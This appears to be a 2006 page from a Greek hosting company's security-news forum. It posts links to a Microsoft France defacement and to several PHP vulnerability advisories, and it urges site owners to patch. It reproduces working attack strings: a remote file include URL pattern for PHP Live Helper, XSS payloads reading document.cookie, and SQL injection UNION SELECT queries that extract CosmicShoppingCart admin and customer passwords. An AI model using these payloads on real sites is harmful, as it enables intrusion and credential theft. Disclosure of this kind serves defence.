Αρχή :: Ενότητες :: Security News :: Ερωτήσεις     
 

INFO Security News :: Θέματα

Τοποθέτησε Νέα Ερώτηση

Link για εγγραφή στο tip.gr feeds

Πρώτη :: Προηγούμενη :: Επόμενη :: Τελευταία   Σελίδα 6 από 9


FORUMS   Microsoft.FR hacked!

Experts.Microsoft.FR hacked!

Όπως και εμείς!~ lol

http://www.valleywag.com/tech/microsoft/expertsmicrosoftfr-hacked-an-ishouldgetpaidforthese-weekend-post-181546.php

http://ibloggedthis.com/2006/06/18/microsoft-france-hacked-and-defaced/

http://portal.centrumxp.pl/blogs/adam/archive/2006/06/19/313376.aspx

http://justanothertechblog.blogspot.com/



Από: Alex - 21/6/2006
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

FORUMS   Mambo Weblinks SQL Injection.

http://downloads.securityfocus.com/vulnerabilities/exploits/mamboweblinks-sql-inj.txt



Από: Alex - 19/6/2006
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

FORUMS   3 Νέα SQL Injections στο PHPNuke

http://downloads.securityfocus.com/vulnerabilities/exploits/phpnuke-mult-sql-inj.txt



Προσοχή! Μπαλώνετε τα site σας για να μην τα ψάχνετε.

Με SQL Injections θα ψάχνετε να βρείτε την database σας. (Users, passwords κλπ)
Και μετά θα καλέσετε την εταιρεία που φιλοξενεί το site σας για να τους ρίξετε την ευθύνη.



Από: Alex - 19/6/2006
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

FORUMS   Τρύπα στο PHP Live Helper

Τρύπα στο PHP Live Helper

PHP Live Helper < 1.x (abspath) Remote File Include Vulnerability (milw0rm)

Η τρύπα# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]


Αναλυτικά

http://www.milw0rm.com/exploits/1926



Από: Alex - 19/6/2006
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

FORUMS   PHP CosmicShoppingCart Αρκετές Τρύπες

PHP CosmicShoppingCart Αρκετές Τρύπες

http://www.cosmicphp.com/freescripts_cosmicshoppingcart.php

Description:
Multiple Cross site scripting and SQL injection vulnerabilities have been found in CosmicShoppingCart.

Details:
1)Multiple Cross site scripting vulnerabilities have been found in the following pages:
cosmicshop/search.php
cosmicshop/search_cat.php
cosmicshop/search_price.php
cosmicshop/product_details.php
Examples:
cosmicshop/search.php?query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
cosmicshop/search_cat.php=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E

2)SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
Vendor: First contact 16/02/2005
Contacted again in 25/03/2005
Publish advisory 25/05/2006

http://www.zone-h.org/advisories/read/id=9058



Από: domain-hosting.gr - 26/5/2006
Καμία απάντηση | Σχολίασε | Ψήφισε η καταχώρησε σε δίκτυο social news

Πρώτη :: Προηγούμενη :: Επόμενη :: Τελευταία   Σελίδα 6 από 9

INFOΝέα Ερώτηση | Καταχώρηση site








Η Εταιρία | Web Hosting | Domain names | Web Information | Υπηρεσίες | Resellers | Υποστήριξη |
Copyright © 2007–09 4GR.NETWORKS, All rights reserved.